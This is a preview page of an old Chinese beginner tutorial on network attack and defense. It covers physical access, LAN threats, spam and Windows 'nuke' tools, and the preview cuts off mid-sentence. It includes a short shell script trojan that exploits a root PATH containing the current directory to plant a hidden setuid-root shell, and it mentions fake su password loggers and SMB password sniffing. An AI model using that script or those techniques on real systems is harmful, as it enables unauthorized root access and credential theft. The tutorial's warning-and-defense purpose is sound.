返回
网络攻防基础教程

网络攻防基础教程

ID:43032159

大小:78.01 KB

页数:10页

时间:2019-09-25

网络攻防基础教程_第1页
网络攻防基础教程_第2页
网络攻防基础教程_第3页
网络攻防基础教程_第4页
网络攻防基础教程_第5页
资源描述:

《网络攻防基础教程》由会员上传分享,免费在线阅读,更多相关内容在教育资源-天天文库

1、网络攻防的基础教程制作:shaokejian单机安全   你有一台电脑,平时用来上上网,玩玩游戏,偶尔也敲点公文进去,你认为它挺安全的,但有一天,你的朋友突然告诉你,他有你的上网帐号和密码,你相信吗?――不要不信,这种方法挺多的,假如你用的是WINDOWS,假如你拨号上网的密码写了保存,那任何人只要在你的电脑上运行某个小软件就……   我从来不保存什么密码――你可能要得意的说,但――你的朋友在你电脑里装了一个木马,可以捕捉拨号网络那个“连接到”的Caption,然后记下你所按的键盘,悄悄地将文件写入一个加密过的文本后再自动退出――会点编程的人应该都做得

2、到,你的电脑是不是失守了?   设了屏幕保护密码――天啊,重启动后还有什么?   设定了管理策略,用策略编辑器编辑过,如果不输密码他就进不了,进去了也什么都干不成!――把你的user.dat和system.dat删掉后用我的代替,这个主意你认为怎么样?   当然我不是让你杯弓蛇影弄得一个朋友都没有只能形影相吊――这样活着太没劲啦!   如果你的电脑没有机密资讯的话当然无所谓,如果有――保证尽量少的人接触它!写了这么多都是WIN9X的,UNIX系统里这方面的问题是不是就少了呢?从物理方面来说,如果一台机器摆放的位置不安全,能让人有足够的时间打开机箱做一些

3、手脚,你的机器就无法安全,就拿我的机子来说吧,我有两块硬盘,但在WIN9X和NT里都看不到第二块硬盘的影子――我把它装上了LINUX,而且只能从一个特定的地方启动它,启动之后,在LINUX下,我可以任意的用mount命令装其它操作系统里的所有数据一扫而空局域网安全   基于同样的道理,局域网中的电脑在物理上仍然要严加控制,同时还要经常性地注意局域网中用户的一些非正常的举动――为什么?这还用问,就拿我身边的例子来说吧,我有个朋友,公司里三十多台电脑连成一个局域网,但这家伙总想弄到主机的最高权限,于是乎监听SMB密文、安装木马忙得不亦乐乎――最后呢,当然得

4、手了,毕竟是我的哥们嘛:)   还有,比如在UNIX中最好要限制ROOT只能由主控台(console)登录、要谨慎使用su命令等等,不然都会给同一网域内的一群“虎视眈眈”想获取最高权限者以机会……   辟如说:shell环境变量PATH中包含用冒号分开的目录名清单,shell按照清单中给定的顺序搜索这些目录,找出运行的命令的可执行文件,PATH变量的典型内容如下:10   $echo$PATH   .:/usr/local/bin:/bin:/usr/bin/:/usr/X11/bin   但如果你是ROOT的话,无论如何要把PATH变量从当前目录开始

5、搜索的设置去掉,不然请考虑下面的可能性:甲请你过去在他的终端上做某些管理员职能,你去了,su成ROOT,执行用户要求你做的系统命令后退出ROOT帐号――无懈可击,但如果用户将在他的目录下做了一个假的su程序……那么你是从当前目录也就是甲的目录开始搜索的,天啊,你执行的是一个根本不知情的程序,可能是用户自己编写的特洛伊程序,用以记录你的密码……   根据上面的原理,你看看如果ROOT不去掉本地目录的话,下面这段代码可能有什么用处吧  #!/bin/sh  cp/bin/sh./stuff/junk/.superdude  chmod4555./stuff

6、/junk/.superdude  rm-f$0  exec/bin/ls${1+"$@"}   然后  %cd  %chmod700.  %touch./-f   明白了吗?这个ls建立了一个隐藏的setuidroot的shell的copy……   远程安全与黑客常用方法   1、针对个人用户   个人用户在网上最常遇到的“侵略性”的行为不外乎以下几种   @垃圾邮件这是一个永恒但又无奈的话题,垃圾邮件包括了诸如一些赚钱、广告之类的信件和恶意的人们通过邮件炸弹发来“成吨重”的信件,这不需要任何技巧,也最是无聊――我收到的此类信件多如牛毛呀!对付此类信

7、件远程登陆删除就行了,也没有必要非查出该发信人的行踪再施以报复――网上这种东西太多,可谓野火烧不尽……然后在信箱配置上设定拒收某些人、或者超大的信件就行了,这种垃圾不在我们的讨论范围之内。   @蓝屏炸弹 10这是针对WIN95的OOB漏洞而开发出来的一些小软件,多命名为*NUKE等等,以前是专门攻击139端口,被攻击的计算机多会出现M$著名的蓝屏蓝屏错误,WIN98下此漏洞已经PATCH上,所以大多数NUKE软件都已失效了,但最近听说一个叫VOOB的软件对WIN98仍然有效――我还没试过呢,要不要拿你开刀?该软件界面如下:(此类软件界面大抵如此,使用

8、简单无比)   要防范此类软件的攻击,一个土办法就是监听端口,网上有许多监听端口的软件,你只要

当前文档最多预览五页,下载文档查看全文

此文档下载收益归作者所有

当前文档最多预览五页,下载文档查看全文
温馨提示:
1. 部分包含数学公式或PPT动画的文件,查看预览时可能会显示错乱或异常,文件下载后无此问题,请放心下载。
2. 本文档由用户上传,版权归属用户,天天文库负责整理代发布。如果您对本文档版权有争议请及时联系客服。
3. 下载前请仔细阅读文档内容,确认文档内容符合您的需求后进行下载,若出现内容与标题不符可向本站投诉处理。
4. 下载文档时可能由于网络波动等原因无法下载或下载错误,付费完成后未能成功下载的用户请联系客服处理。